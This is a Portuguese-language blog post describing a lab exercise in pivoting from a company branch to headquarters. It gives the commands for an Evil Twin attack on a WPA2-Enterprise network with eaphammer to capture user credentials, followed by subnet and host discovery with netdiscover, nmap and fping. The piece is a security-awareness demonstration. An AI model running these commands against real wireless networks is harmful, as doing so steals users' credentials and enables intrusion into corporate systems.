segunda-feira, 10 de fevereiro de 2020

PIVOTING: DA FILIAL PARA MATRIZ

Com o objetivo de mostrar a importância da segurança da informação em filiais, neste artigo irei abordar os seguintes tópicos:
  • Ataques wireless;
  • Descoberta de sub redes;
  • Descoberta de hosts;
  • Descoberta de serviços;
Para comprometer a infraestrutura de uma empresa, muitas das vezes os ataques cibernéticos tem como alvo as filiais, para realização de pivoting até a matriz.

Essa será a infraestrutura do lab demonstrando uma empresa:
  • Dois firewalls fechando uma VPN site-to-site (filial <--> matriz);
  • Usuário (filial) com notebook conectado em um roteador wireless;
  • Um servidor (genérico) na matriz;

Acessando a rede da filial

O primeiro passo é conseguir acessar a rede da filial. Para isso, irei analisar a rede:


Tive como resultado os seguintes detalhes:
  • SSID: Contoso
  • Segurança: WPA & WPA2 Enterprise
  • Autenticação: Radius
A rede wireless está configurada com um protocolo de segurança WPA & WPA2 Enterprise que funciona via servidor Radius. 

Sabendo disso, irei fazer um ataque do tipo Evil Twin com foco em redes wireless Enterprise.

Clonando o repositório da ferramenta de ataque eaphammer

$ : git clone https://github.com/s0lst1c3/eaphammer/
  • Distro Kali: cd eaphammer/ && ./kali-setup
  • Outras distros: https://github.com/s0lst1c3/eaphammer/wiki/Setup-Guide#i-kali-setup-instructions 

Pegando o BSSID da rede alvo

# Iniciando a placa de rede wifi em modo monitoramento 
$ : airmon-ng start wlan0


# Capturando redes wireless 5Ghz
 

$ : airodump-ng wlan0mon -b a


Gerando certificado para rede alvo e realizando o ataque

# Gerando certificado com informações da empresa
$ : ./eaphammer --cert-wizard


 

# Criando AP falso
$ : ./eaphammer --bssid B0:BE:76:0E:E5:D8 --essid Contoso --channel 6 --auth wpa-eap --interface wlan0 --creds

 


Os clientes começarão a se desconectar da rede de destino e a se conectar ao meu AP.


Ao inserir as credenciais solicitadas e tentarem se conectar, os dados serão enviados para o atacante.


Acessando a rede e realizando descoberta de sub redes, hosts e serviços

Com acesso a rede, o objetivo agora é encontrar alguma rota para rede da matriz. Para conseguir isso, irei utilizar uma ferramenta chamada netdiscover, que tem como sua principal função a análise de rotas.

$ : netdiscover -L


Outros meios para se fazer a descoberta sub redes e hosts é utilizando o nmap ou fping:

$ : nmap -sP 172.16.0.0/24


$ : fping -s -g 172.16.0.1 172.16.0.50


Ao comprometer um dispositivo, também é possível realizar a descoberta de hosts consultando o arquivo hosts do sistema operacional:

Windows: System32\drivers\etc\hosts

Linux: /etc/hosts

MAC OS: /private/etc/hosts
 


Conclusão

Conforme vimos no decorrer do artigo, com um simples acesso a rede da filial é possível escalarmos até a rede da matriz. Segurança da informação é composta por pessoas, processos e tecnologias, ou seja, não basta comprar aquele firewall, SIEM, IPS ou antivírus de última geração se a estratégia de implementação, ciclo de vida, sustentação e resposta a incidentes não forem capazes de acompanhar a evolução de ameaças nos dias de hoje.






Nenhum comentário:

Postar um comentário